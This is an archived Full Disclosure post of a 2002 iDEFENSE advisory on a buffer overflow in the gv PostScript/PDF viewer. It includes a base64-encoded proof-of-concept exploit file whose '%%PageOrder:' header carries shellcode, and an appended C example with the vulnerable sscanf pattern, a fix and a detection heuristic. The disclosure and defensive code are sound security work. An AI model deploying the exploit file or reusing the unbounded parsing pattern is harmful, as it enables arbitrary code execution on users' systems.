Full Disclosure mailing list archives
iDEFENSE Security Advisory 09.26.2002: Exploitable Buffer Overflow in gv
From: dendler () idefense com (David Endler)
Date: Thu, 26 Sep 2002 11:56:02 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 09.26.2002
Exploitable Buffer Overflow in gv

DESCRIPTION

The gv program shipped on many Unix systems contains a buffer overflow that an attacker can trigger by supplying a malformed PostScript or PDF file. Successful exploitation runs arbitrary code with the privileges of the user who opened the file.

gv is a PostScript and PDF viewer for Unix that drives the ghostscript interpreter. It is maintained by Johannes Plass at http://wwwthep.physik.uni-mainz.de/~plass/gv/.

The vulnerability lies in the source code that interprets PostScript and PDF files: an sscanf() call copies a value from the file into a fixed-size buffer without checking its length, so an overlong value in the file's header comments overruns the buffer.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2001-0832 to this issue.

ANALYSIS

To exploit the flaw, an attacker has to get a user to open a malformed PDF or PostScript file with gv from the command line. This is easier against Unix mail clients that associate gv with attachments, since the viewer is then launched on an attacker-supplied file automatically. gv is not normally installed setuid root, so the attacker gains only the privileges of the user running it. Programs built on derivatives of gv, such as ggv or kghostview, may be vulnerable in similar ways.

A proof-of-concept exploit for Red Hat Linux written by zen-parse is attached to this message. It packages the overflow and shellcode in the "%%PageOrder:" comment of the file. (Although the attachment is named gv-exploit.pdf, it begins with a PostScript "%!PS-Adobe-3.0" header; the comment it abuses is a standard DSC header line.) The shellcode's effect is to create /tmp/itworked, so the presence of that file after the run shows that the payload executed:

[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
-rw-r--r--    1 root     root            0 Aug 22 16:50 /tmp/itworked
[root@victim]#

The transcript was run as root only for demonstration; the file is created as whichever user runs gv.

DETECTION

gv 3.5.8, the latest release at the time of writing, is affected. The exploit has been tested on Red Hat Linux 7.3.

WORKAROUND

Users can switch to another viewer, for example kghostview (included with the KDE desktop environment). Note, however, that the ANALYSIS section above cautions that derivatives of gv such as kghostview may share the flaw, so a replacement viewer only helps if it is known not to reuse the same parsing code. The vulnerability also does not appear to be exploitable when a file is opened from the gv interface rather than from the command line, so avoiding command-line (and mail-client) invocation of gv on untrusted files reduces exposure.

VENDOR RESPONSE

The author could not be contacted, and the main home page has not been updated since 1997. Coordinated public disclosure was scheduled for September 26, 2002 with Unix vendors.

DISCLOSURE TIMELINE

8/23/2002  Disclosed to iDEFENSE
9/6/2002   Disclosed to vendor (plass () thep physik uni-mainz de) by iDEFENSE
9/6/2002   Disclosed to iDEFENSE clients
9/12/2002  Disclosed to Unix vendors
9/13/2002  Second vendor disclosure attempt
9/26/2002  Public disclosure

CREDIT

This issue was exclusively disclosed to iDEFENSE by zen-parse (zen-parse () gmx net).

Get paid for vulnerability research
http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive Suite 100 Chantilly, VA 20151 voice: 703-344-2632 fax: 703-961-1071 dendler () idefense com www.idefense.com -----BEGIN PGP SIGNATURE----- Version: PGP 7.1.2 Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A iQA/AwUBPZMs8ErdNYRLCswqEQKKnACg87389/B9tzoiBDV8zu/M68/TFO0AnjJV 7Yn3xdN19+K9frKhYSDgxSXX =weJR -----END PGP SIGNATURE----- --01628847 Content-Type: application/pdf; name="gv-exploit.pdf" Content-Transfer-Encoding: Base64 Content-Disposition: attachment; filename="gv-exploit.pdf" JSFQUy1BZG9iZS0zLjANCiUlQ3JlYXRvcjogZ3JvZmYgMS4xNiAod2l0aCBtb2RpZmljYXRpb25z IGJ5IHplbi1wYXJzZSBieSBoYW5kIDEuMDBhKQ0KJSVDcmVhdGlvbkRhdGU6IFNhdCBKdW4gMTUg MTU6MzBpc2gNCiUlUGFnZU9yZGVyOiBBQUFBQUFBQUFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFC Q0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJD REFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNE QUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RBQkNEQUJDREFCQ0RB QkNEYWFhYWJiYmJjY2NjZGRkZGVlZWVmZmZmZ2dnZ2hoaGhpaWlpampqamtra2tsbGxsbW1tbW5u bm5vb29vcHBwcHFxcXFycnJyc3Nzc3R0dHR1dXV1dnZ2dnd3d3eg8v+/QEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA 
QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAvPz//78xwGgv L3NoaC9iaW6J41BoLy9zaGgvYmluieFQaC1wcGOJ5lBocmtlZGhpdHdvaHRtcC9oRlN9L2hoJHtJ aHRvdWOJ4lBSVlFUWVBUWrAhSEhISEhISEhISEhISEhISEhISEhISM2ADQolJUVuZENvbW1lbnRz DQolJUVPRg0K --01628847--
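The bug class the advisory describes, as an added example that is not gv's source or the attached proof of concept: a DSC header value read with an unbounded sscanf() into a fixed stack buffer, the bounded form a maintainer would substitute (field width plus a truncation check plus a keyword whitelist), and a file-level detection heuristic that flags documents whose "%%Key: value" comments carry values far longer than any legitimate DSC keyword, which is the shape of the attached gv-exploit.pdf. The buffer size LINEBUF, all function names, the padding lengths and the sample document are assumptions made for illustration.

```c
/* Added example, not gv's source: the sscanf() pattern behind this advisory,
 * a bounded replacement, and a file-level detection heuristic. LINEBUF, the
 * function names, the padding sizes and the sample document are assumptions. */
#include <stdio.h>
#include <string.h>

#define LINEBUF 256   /* assumed size of the fixed stack buffer */

/* Vulnerable pattern: "%s" has no field width, so a %%PageOrder: value longer
 * than LINEBUF-1 bytes is written past key[] on the stack. Shown for reading
 * only; never call it on untrusted input. */
int parse_page_order_unsafe(const char *line, char *out, size_t outlen)
{
    char key[LINEBUF];
    if (sscanf(line, "%%%%PageOrder: %s", key) != 1)   /* unbounded copy */
        return -1;
    snprintf(out, outlen, "%s", key);
    return 0;
}

/* Bounded replacement. 0 = value copied to out, -1 = not a %%PageOrder: line,
 * 1 = value is not a DSC keyword, 2 = value would not have fit the buffer. */
int parse_page_order_safe(const char *line, char *out, size_t outlen)
{
    char key[LINEBUF]; int consumed = 0;
    /* %255s stops after LINEBUF-1 bytes; %n records where scanning stopped */
    if (sscanf(line, "%%%%PageOrder: %255s%n", key, &consumed) != 1)
        return -1;
    /* non-whitespace right after the field means it was silently truncated,
     * i.e. exactly the input that overflows the unbounded version above */
    if (line[consumed] != '\0' && strchr(" \t\r\n", line[consumed]) == NULL)
        return 2;
    if (strcmp(key, "Ascend") && strcmp(key, "Descend") && strcmp(key, "Special"))
        return 1;
    snprintf(out, outlen, "%s", key);
    return 0;
}

/* 1 if line parses safely to exactly expect, else 0 */
int page_order_is(const char *line, const char *expect)
{
    char out[LINEBUF];
    return parse_page_order_safe(line, out, sizeof out) == 0 &&
           strcmp(out, expect) == 0;
}

/* Bounded parser's verdict on "%%PageOrder: " followed by padlen bytes of 'A' */
int check_padded_page_order(size_t padlen)
{
    char line[4096], out[LINEBUF];
    if (padlen > sizeof line - 32) return -2;
    int n = snprintf(line, sizeof line, "%%%%PageOrder: ");
    memset(line + n, 'A', padlen);
    strcpy(line + n + padlen, "\r\n");
    return parse_page_order_safe(line, out, sizeof out);
}

/* Detection heuristic: longest value on any "%%Key: value" comment line.
 * Legitimate DSC values are short; the attached PoC carries hundreds of bytes. */
size_t dsc_max_value_len(const char *doc)
{
    size_t max = 0;
    const char *p = doc;
    while (*p) {
        const char *eol = strpbrk(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);
        const char *colon = (linelen > 2 && p[0] == '%' && p[1] == '%')
                          ? (const char *)memchr(p, ':', linelen) : NULL;
        if (colon) {
            size_t vlen = (size_t)(p + linelen - (colon + 1));
            if (vlen && colon[1] == ' ') vlen--;   /* skip the separating space */
            if (vlen > max) max = vlen;
        }
        if (!eol) break;
        p = eol + 1;
    }
    return max;
}

/* Constructed sample: a DSC header like the PoC's with a padded %%PageOrder: */
size_t sample_max_value_len(size_t padlen)
{
    char doc[4096];
    if (padlen > sizeof doc - 128) return 0;
    int n = snprintf(doc, sizeof doc,
                     "%%!PS-Adobe-3.0\r\n%%%%Creator: groff 1.16\r\n%%%%PageOrder: ");
    memset(doc + n, 'A', padlen);
    strcpy(doc + n + padlen, "\r\n%%EndComments\r\n%%EOF\r\n");
    return dsc_max_value_len(doc);
}

int main(void)
{
    printf("Ascend accepted: %d\n", page_order_is("%%PageOrder: Ascend\r\n", "Ascend"));
    printf("600-byte value: %d (2 = rejected as overlong)\n", check_padded_page_order(600));
    printf("longest DSC value in sample: %zu bytes\n", sample_max_value_len(600));
    return 0;
}
```

Build with `cc -Wall -o dsc_check dsc_check.c && ./dsc_check` (file name assumed). The width on `%255s` alone is not enough: sscanf stops quietly at the width, so without the `%n` check a 300-byte value would be accepted as a 255-byte one, and the keyword whitelist is what turns "does not crash" into "only takes values the DSC defines". The scanner is a triage heuristic for mail gateways or incident responders looking for files of the attached kind; it does not prove a file is safe, only that no header comment carries an implausibly long value.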